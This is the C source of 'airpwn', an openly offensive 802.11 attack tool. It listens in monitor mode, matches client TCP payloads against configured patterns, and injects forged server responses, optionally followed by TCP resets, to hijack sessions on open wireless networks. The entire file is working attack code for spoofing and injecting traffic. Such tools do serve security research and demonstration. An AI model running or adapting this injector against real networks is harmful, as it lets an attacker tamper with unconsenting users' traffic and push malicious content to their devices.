/*
 * Copyright (C) 2004 toast
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
 * 02111-1307, USA.
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>

#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <time.h>

#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/wireless.h>

#include <getopt.h>

#define _NET_IF_H // to avoid double-includes
#include <libnet.h>
#include <pcap.h>

#include "conf.h"
#include "802_11.h"

// context for holding program state
struct airpwn_ctx {
  conf_entry *conf_list;
  char *in_if;
  char *out_if;
  int inject_sock;
  libnet_ptag_t tcp_t;
  libnet_ptag_t ip_t;
  libnet_t *lnet;
  unsigned int verbosity;
  FILE *logfile;
};

typedef struct airpwn_ctx airpwn_ctx;
  
/* 
 * Convenience function which is a wrapper for printf.  Only prints if
 * log_level is less than ctx->verbosity.
 */
void printlog(airpwn_ctx *ctx, int log_level, char *format, ...){
  va_list ap;

  if(ctx->verbosity >= log_level){
    va_start(ap, format);
    vprintf(format, ap);
    va_end(ap);
  }
}

/*
 * Function for printing usage information
 * */
void usage(){
  printf("usage: airpwn -i <in if> -o <out if> -c <conf file> [options]\n");
  printf("\t<in if> : interface to listen on (must be in monitor mode)\n");
  printf("\t<out if> : interface to send packets from (must be in master mode)\n");
  printf("\t<conf file> : configuration file\n");
  printf("\nOptional arguments:\n");
  printf("\t-l <logfile> : log verbose data to a file\n");
  printf("\t-f <filter> : bpf filter for libpcap\n");
  printf("\t-h : get help (this stuff)\n");
  printf("\t-v : increase verbosity (can be used multiple times)\n");
  printf("\n");
}

/*
 * Thread that listens for integers on stdin an interprets them as
 * channels.  If the channel is valid, it will immediately switch to
 * that channel on both interfaces.
 */
void *channel_thread(void *arg){
  airpwn_ctx *ctx = arg;
  unsigned int channel;
  int sock;
  struct iwreq iwr;
  char buff[80];
  
  printlog(ctx, 2, "Channel changing thread starting..\n");

  sock = socket(PF_INET, SOCK_DGRAM, 0);
  if(sock < 0){
    perror("channel_thread: socket");
    return;
  }
  
  for(;;){
    if(fgets(buff, sizeof(buff), stdin) && strlen(buff) > 1){
      channel = atoi(buff);
      if(channel > 11 || channel == 0)
	printlog(ctx, 0, "Error: illegal channel specified\n", channel);
      else {
	printlog(ctx, 0, "changing channel to %u\n", channel);

	// change channel for listening interface
	bzero(&iwr, sizeof(iwr));
	strncpy(iwr.ifr_name, ctx->in_if, IFNAMSIZ);
	iwr.u.freq.m = channel;
	
	if(ioctl(sock, SIOCSIWFREQ, &iwr) < 0){
	  perror("ioctl(SIOCSIWFREQ)");
	}

	// and again for the sending interface
	bzero(&iwr, sizeof(iwr));
	strncpy(iwr.ifr_name, ctx->out_if, IFNAMSIZ);
	iwr.u.freq.m = channel;
	
	if(ioctl(sock, SIOCSIWFREQ, &iwr) < 0){
	  perror("ioctl(SIOCSIWFREQ)");
	}
      }
    }
  }
}

/*
 * Function to open and return a raw socket on the injection interface.
 * Returns a socket file descriptor on success or NULL on failure.
 */
int create_injection_socket(char *interface){
  int inject_sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
  if(inject_sock < 0){
    perror("socket");
    return 0;
  }

  struct ifreq ifr;

  bzero(&ifr, sizeof(ifr));
  // use <interface>ap to bind to, this is created by executing 
  // "iwpriv <interface> hostapd 1"
  snprintf((char*)&ifr.ifr_name, sizeof(ifr.ifr_name), "%sap", interface);
  if(ioctl(inject_sock, SIOCGIFINDEX, &ifr) != 0) {
    perror("ioctl(SIOCGIFINDEX)");
    return 0;
  }

  struct sockaddr_ll addr;

  bzero(&addr, sizeof(addr));
  addr.sll_family = AF_PACKET;
  addr.sll_ifindex = ifr.ifr_ifindex;

  if(bind(inject_sock, (struct sockaddr *)&addr, sizeof(addr)) < 0){
    perror("bind");
    return 0;
  }

  bzero(&ifr, sizeof(ifr));
  snprintf((char*)&ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface);

  // test to make sure the interface is the right type..
  if(ioctl(inject_sock, SIOCGIFHWADDR, &ifr) != 0) {
    perror("ioctl(SIOCGIFHWADDR)");
    return 0;
  }

  if(ifr.ifr_hwaddr.sa_family != ARPHRD_ETHER) {
    printf("Invalid family %04x\n", ifr.ifr_hwaddr.sa_family);
    return 0;
  }

  return inject_sock;
}

/*
 * Convenience function to extract the ssid name from a raw 802.11 frame
 * and copy it to the ssid_name argument.  max_name_len is the length of
 * the ssid_name buffer
 */
int get_ssid(const u_char *packet_data, char *ssid_name, u_short max_name_len){
  if(packet_data[36] == 0){ // this is the SSID
    u_short ssid_len = packet_data[37];

    if(ssid_len == 0){
      ssid_name[0] = 0;

      return 0;
    }

    u_short max_len = ssid_len > max_name_len ? max_name_len - 1 : ssid_len;

    memcpy(ssid_name, &packet_data[38], max_len);

    ssid_name[max_len] = 0;

    return 0;
  }

  return -1;
}

/*
 * Function to inject a server-to-client packet in response to a
 * client-to-server packet.  w_hdr, ip_hdr and tcp_hdr are the layer 2,
 * 3 and 4 headers.  conf is a pointer to a conf_entry structure
 * containing the payload to inject.
 */
void spoof_response(airpwn_ctx *ctx,
    conf_entry *conf,
    ieee80211_hdr *w_hdr, 
    struct iphdr *ip_hdr, 
    struct tcphdr *tcp_hdr)
{
  char errbuf[LIBNET_ERRBUF_SIZE];

  // libnet wants the data in host-byte-order
  u_int ack = ntohl(tcp_hdr->seq) + 
    ( ntohs(ip_hdr->tot_len) - ip_hdr->ihl * 4 - tcp_hdr->doff * 4 );
  
  ctx->tcp_t = libnet_build_tcp(
      ntohs(tcp_hdr->dest), // source port
      ntohs(tcp_hdr->source), // dest port
      ntohl(tcp_hdr->ack_seq), // sequence number
      ack, // ack number
      TH_PUSH | TH_ACK, // flags
      0xffff, // window size
      0, // checksum
      0, // urg ptr
      20 + conf->response_len, // total length of the TCP packet
      conf->response, // response
      conf->response_len, // response_length
      ctx->lnet, // libnet_t pointer
      ctx->tcp_t // ptag
      );

  if(ctx->tcp_t == -1){
    printf("libnet_build_tcp returns error: %s\n", libnet_geterror(ctx->lnet));
    return;
  }

  ctx->ip_t = libnet_build_ipv4(
      40 + conf->response_len, // length
      0, // TOS bits
      1, // IPID (need to calculate)
      0, // fragmentation
      0xff, // TTL
      6, // protocol
      0, // checksum
      ip_hdr->daddr, // source address
      ip_hdr->saddr, // dest address
      NULL, // response
      0, // response length
      ctx->lnet, // libnet_t pointer
      ctx->ip_t // ptag
      );

  if(ctx->ip_t == -1){
    printf("libnet_build_ipv4 returns error: %s\n", libnet_geterror(ctx->lnet));
    return;
  }

  // copy the libnet packets to to a buffer to send raw..
  
  char packet_buff[0xffff];

  memcpy(packet_buff, w_hdr, IEEE80211_HDR_LEN);

  ieee80211_hdr *n_w_hdr = (ieee80211_hdr *)packet_buff;

  // set the FROM_DS flag and swap MAC addresses
  n_w_hdr->flags = IEEE80211_FROM_DS;
  n_w_hdr->type = IEEE80211_TYPE_IP;

  uint8_t tmp_addr[6];
  memcpy(tmp_addr, n_w_hdr->addr1, 6);
  memcpy(n_w_hdr->addr1, n_w_hdr->addr2, 6);
  memcpy(n_w_hdr->addr2, tmp_addr, 6);
  
  u_int32_t packet_len;
  u_int8_t *lnet_packet_buf;
  
  // cull_packet will dump the packet (with correct checksums) into a
  // buffer for us to send via the raw socket
  if(libnet_adv_cull_packet(ctx->lnet, &lnet_packet_buf, &packet_len) == -1){
    printf("libnet_adv_cull_packet returns error: %s\n", 
	libnet_geterror(ctx->lnet));
    return;
  }

  memcpy(packet_buff + IEEE80211_HDR_LEN, lnet_packet_buf, packet_len);

  libnet_adv_free_packet(ctx->lnet, lnet_packet_buf);

  int len = send(ctx->inject_sock, packet_buff, 
      IEEE80211_HDR_LEN + 40 + conf->response_len, 0);

  if(len < 0){
    perror("send");
  }

  printlog(ctx, 2, "wrote %d bytes to the wire(less)\n", len);
  
  // follow up the packet with a reset packet if conf tells us to..
  if(conf->options & CONF_OPTION_RESET){
    ctx->tcp_t = libnet_build_tcp(
	ntohs(tcp_hdr->dest), // source port
	ntohs(tcp_hdr->source), // dest port
	ntohl(tcp_hdr->ack_seq) + conf->response_len, // sequence number
	ack,
	TH_RST | TH_ACK, // flags
	0xffff, // window size
	0, // checksum
	0, // urg ptr
	20, // total length of the TCP packet
	NULL, // response
	0, // response_length
	ctx->lnet, // libnet_t pointer
	ctx->tcp_t // ptag
	);

    if(ctx->tcp_t == -1){
      printf("libnet_build_tcp returns error: %s\n", libnet_geterror(ctx->lnet));
      return;
    }

    ctx->ip_t = libnet_build_ipv4(
	40 + conf->response_len, // length
	0, // TOS bits
	1, // IPID (need to calculate)
	0, // fragmentation
	0xff, // TTL
	6, // protocol
	0, // checksum
	ip_hdr->daddr, // source address
	ip_hdr->saddr, // dest address
	NULL, // response
	0, // response length
	ctx->lnet, // libnet_t pointer
	ctx->ip_t // ptag
	);

    if(libnet_adv_cull_packet(ctx->lnet, &lnet_packet_buf, &packet_len) == -1){
      printf("libnet_adv_cull_packet returns error: %s\n", 
	  libnet_geterror(ctx->lnet));
      return;
    }

    memcpy(packet_buff + IEEE80211_HDR_LEN, lnet_packet_buf, packet_len);

    libnet_adv_free_packet(ctx->lnet, lnet_packet_buf);

    len = send(ctx->inject_sock, packet_buff, IEEE80211_HDR_LEN + 40, 0);

    printlog(ctx, 2, "wrote reset (%d bytes)\n", len);
  }
}

/*
 * Called by pcap_loop for every packet that passes the (optional) bpf
 * filter
 */
void pckt_callback(u_char *user, const struct pcap_pkthdr *pkthdr, 
    const u_char *packet_data)
{
  ieee80211_hdr *w_hdr;
  airpwn_ctx *ctx = (airpwn_ctx *)user;
  char ssid_name[256];
  int ovector[30];
  time_t timeval;
  struct tm *tmval;

  switch(packet_data[0]){
    // data packet
    case 0x08:
      w_hdr = (ieee80211_hdr *)packet_data;
      
      // check if it's a client-to-AP packet and is an IP packet
      if(w_hdr->flags & IEEE80211_TO_DS &&
	  w_hdr->type == IEEE80211_TYPE_IP){

	struct iphdr *ip_hdr = (struct iphdr*)(packet_data + IEEE80211_HDR_LEN);

	// check to see if it's TCP..
	if(ip_hdr->protocol == IPPROTO_TCP){ 
	  struct tcphdr *tcp_hdr = 
	    (struct tcphdr*) (packet_data + IEEE80211_HDR_LEN + 
			      (ip_hdr->ihl * 4));

	  u_char *data_ptr = 
	    (u_char*)tcp_hdr + tcp_hdr->doff * 4;

	  short datalen = pkthdr->caplen - (data_ptr - packet_data);

	  // make sure the packet isn't empty..
	  if(datalen){ 
	    conf_entry *conf;

	    for(conf = ctx->conf_list; conf != NULL; conf = conf->next){
	      if(pcre_exec(conf->match, NULL, data_ptr, datalen, 0, 0, 
		    ovector, 30) > 0)
	      {
		printlog(ctx, 2, "Matched pattern for conf '%s'\n", conf->name);

		if(pcre_exec(conf->ignore, NULL, data_ptr, datalen, 0, 0, 
		      ovector, 30) > 0)
		{
		  printlog(ctx, 2, "Matched ignore for conf '%s'\n", 
		      conf->name);
		} else {
		  spoof_response(ctx, conf, w_hdr, ip_hdr, tcp_hdr);
		  timeval = time(NULL);
		  tmval = localtime(&timeval);
		  if(tmval == NULL){
		    perror("localtime");
		    return;
		  }

		  printlog(ctx, 1, 
		      "[%d:%02d:%02d] injecting data for conf '%s'\n",
		      tmval->tm_hour, tmval->tm_min, tmval->tm_sec,
		      conf->name);

		  // log the data if requested
		  if(ctx->logfile){
		    struct in_addr in;
		    char ip1[16], ip2[16], buf[512];

		    in.s_addr = ip_hdr->saddr;
		    memcpy(ip1, inet_ntoa(in), sizeof(ip1));
		    in.s_addr = ip_hdr->daddr;
		    memcpy(ip2, inet_ntoa(in), sizeof(ip2));

		    snprintf(buf, sizeof(buf)-1, 
			"[%d:%02d:%02d] from: %s to: %s port: %hu\n",
			tmval->tm_hour, tmval->tm_min, tmval->tm_sec,
			ip1, ip2, ntohs(tcp_hdr->dest)
			);
		    write(fileno(ctx->logfile), buf, strlen(buf));
		    write(fileno(ctx->logfile), data_ptr, datalen);
		    write(fileno(ctx->logfile), "\n\n", 2);
		    //fflush_unlocked(ctx->logfile);
		  }
		}
	      }
	    }
	  }
	}
      }
      break;
    case 0x80:
      get_ssid(packet_data, ssid_name, sizeof(ssid_name));
      printlog(ctx, 3, "  beacon frame (%s)\n", ssid_name);
      break;
    case 0x40:
      get_ssid(packet_data, ssid_name, sizeof(ssid_name));
      printlog(ctx, 3, "  probe request (%s)\n", ssid_name);
      break;
    case 0x50:
      get_ssid(packet_data, ssid_name, sizeof(ssid_name));
      printlog(ctx, 3, "  probe response (%s)\n", ssid_name);
      break;
    case 0xd4:
      printlog(ctx, 3, "  acknowledgement\n");
      break;
    case 0x48:
      printlog(ctx, 3, "  null function\n");
      break;
    case 0xb0:
      printlog(ctx, 3, "  authentication\n");
      break;
    case 0xc0:
      printlog(ctx, 3, "  deauthentication\n");
      break;
    case 0x30:
      printlog(ctx, 3, "  reassociation response\n");
      break;
    case 0xc4:
      printlog(ctx, 3, "  clear to send\n");
      break;
    default:
      printlog(ctx, 4, " ***  unknown type %x\n", packet_data[0]);
  }
}

/*
 * Calls pcap_loop in a loop, listens for packets and processes..
 */
void pcap_monitor(char *interface, airpwn_ctx *ctx, char *filterstr){
  pcap_t *pctx;
  char errbuf[PCAP_ERRBUF_SIZE];
  struct bpf_program prog;

  pctx = pcap_open_live(interface, 0xffff, 1, 1, errbuf);

  if(pctx == NULL){
    printf("Error rerturned from pcap_open_live: %s\n", errbuf);

    return;
  }

  if(filterstr){
    if(pcap_compile(pctx, &prog, filterstr, 0, 0)){
      printf("Error returned from pcap_compile: %s\n", pcap_geterr(pctx));

      exit(1);
    }

    if(pcap_setfilter(pctx, &prog)){
      printf("Error returned from pcap_setfilter: %s\n",
	  pcap_geterr(pctx));

      exit(1);
    }
  }

  for(;;){
    pcap_loop(pctx, 1, pckt_callback, (u_char*)ctx);
  }
}


int main(int argc, char **argv){
  char *conf_file = NULL;
  char lnet_err[LIBNET_ERRBUF_SIZE];
  char *filterstr=NULL;
  
  if (argc < 7) { // minimum # of arguments
    usage();
    exit(1);
  }

  airpwn_ctx *ctx = calloc(1, sizeof(airpwn_ctx));
  if(ctx == NULL){
    perror("calloc");
    exit(1);
  }

  for(;;){
    int c = getopt(argc, argv, "i:o:c:l:f:vh");

    if(c < 0)
      break;

    switch(c){
      case 'h':
	usage();
	exit(0);
      case 'v':
	ctx->verbosity++;
	break;
      case 'i':
	ctx->in_if = optarg;
	break;
      case 'o':
	ctx->out_if = optarg;
	break;
      case 'c':
	conf_file = optarg;
	break;
      case 'f':
	filterstr = optarg;
	break;
      case 'l':
	ctx->logfile = fopen(optarg, "a");
	if(ctx ->logfile == NULL){
	  perror("fopen");
	  exit(1);
	}
	break;
      default:
	usage();
	exit(1);
    }
  }

  if(ctx->in_if == NULL || ctx->out_if == NULL || conf_file == NULL){
    usage();
    exit(1);
  }
	
  printlog(ctx, 1, "Parsing configuration file..\n");
  
  ctx->conf_list = parse_config_file(conf_file);
  if(ctx->conf_list == NULL){
    printf("Error parsing configuration file.\n");
    exit(1);
  }

  printlog(ctx, 1, "Opening injection socket..\n");

  ctx->inject_sock = create_injection_socket(ctx->out_if);

  if(ctx->inject_sock == 0){
    printf("Error opening injection socket on interface %s\n", ctx->out_if);
    exit(1);
  }

  ctx->lnet = libnet_init(LIBNET_LINK_ADV, ctx->out_if, lnet_err);
  if(ctx->lnet == NULL){
    printf("Error in libnet_init: %s\n", lnet_err);

    exit(1);
  }

  printlog(ctx, 0, "Listening for packets...\n");
  
  pthread_t thread;
  if(pthread_create(&thread, NULL, channel_thread, ctx)){
    perror("pthread_create");
    exit(1);
  }
  
  pcap_monitor(ctx->in_if, ctx, filterstr);
}
